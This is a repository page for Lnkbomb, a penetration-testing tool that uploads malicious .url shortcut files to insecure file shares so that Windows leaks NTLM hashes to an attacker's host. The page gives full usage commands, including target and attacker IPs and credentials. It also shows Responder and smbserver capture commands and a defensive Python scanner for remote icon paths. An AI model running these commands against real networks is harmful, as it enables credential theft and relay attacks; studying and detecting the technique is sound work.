  • Stars: 248
  • Rank 163,560 (Top 4 %)
  • Language: Python
  • License: MIT License
  • Created almost 3 years ago
  • Updated over 1 year ago

Repository Details

Malicious shortcut generator for collecting NTLM hashes from insecure file shares.

Lnkbomb

Lnkbomb is used for uploading malicious shortcut files to insecure file shares. The vulnerability exists due to Windows looking for an icon file to associate with the shortcut file. This icon file can be directed to a penetration tester's machine running Responder or smbserver to gather NTLMv1 or NTLMv2 hashes (depending on configuration of the victim host machine). The tester can then attempt to crack those collected hashes offline with a tool like Hashcat, or relay them to a tool like ntlmrelayx for further exploitation.

The payload file is uploaded directly to the insecure file share specified by the tester on the command line. The tester's IP address is also supplied on the command line and written into the payload.

Version 2.0 is a total rebuild of the tool and uses the pysmb library, permitting unauthenticated and authenticated payload drops.
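
From the defender's side, the icon lookup described above can be audited. The sketch below is an added example, not part of Lnkbomb: it walks a share and flags .url files whose IconFile entry points at a remote host. It assumes the standard [InternetShortcut] INI layout of .url files; the function names, sample contents and the 192.0.2.10 address are constructed for illustration.

```python
import re
import sys
from pathlib import Path

# UNC path (\\host\share) or file://host/ URL; group 1 is the remote host.
# file:///C:/... (a local drive) deliberately does not match.
REMOTE = re.compile(r"^(?:file:)?[\\/]{2}([^\\/:]+)[\\/]", re.IGNORECASE)

# Constructed samples (documentation-range address, not taken from the tool).
SAMPLE_REMOTE = r"""[InternetShortcut]
URL=https://intranet.example/
IconFile=\\192.0.2.10\share\icon.ico
"""
SAMPLE_LOCAL = r"""[InternetShortcut]
URL=https://intranet.example/
IconFile=C:\Windows\System32\shell32.dll
"""

def remote_icon_host(url_text):
    """Return the host an [InternetShortcut] IconFile loads from, or None."""
    section = None
    for line in url_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "iconfile":
                match = REMOTE.match(value.strip().strip('"'))
                if match:
                    return match.group(1).lower()
    return None

def scan_share(root, allowed_hosts=()):
    """List (path, host) for .url files whose icon comes from a non-allowed host."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path in Path(root).rglob("*"):
        if path.suffix.lower() != ".url" or not path.is_file():
            continue
        # utf-8-sig drops a BOM that would otherwise hide the section header.
        text = path.read_text(encoding="utf-8-sig", errors="replace")
        host = remote_icon_host(text)
        if host and host not in allowed:
            findings.append((str(path), host))
    return sorted(findings)

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, host in scan_share(root, allowed_hosts=sys.argv[2:]):
        print(f"{path}: icon loads from {host}")
```

Pass the file servers that legitimately host icons as allowed_hosts; any other hit is worth reviewing alongside outbound SMB to that address.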

Python Usage

Installing Lnkbomb

Note that the project works consistently on Windows. It may have issues on Linux.

git clone https://github.com/dievus/lnkbomb.git

Change directories to lnkbomb and run:

python3 lnkbomb.py -h

This will output the help menu, which contains the following flags:

-h, --help - Lists the help options

-t, --target - Specifies the target IP address

-a, --attacker - Specifies the tester's attack machine IP address

-r, --recover - Used to remove the payload when testing is completed (ex. -r payloadname.url)

-w, --windows - New command - required for setting appropriate ports for Windows shares

-l, --linux - New command - required for setting appropriate ports for Linux shares

-n, --netbios - New command - the NetBIOS name of the targeted Windows machine; must be included for Windows targets

Examples of full commands include:

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

You will need to utilize a tool like Responder or smbserver to capture the NTLM hash.

responder -I eth0 -dwFP -v

or

smbserver.py . . -smb2support

Notes

Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.

I know it's .url shortcuts and not .lnk extensions. I do it to trigger you.
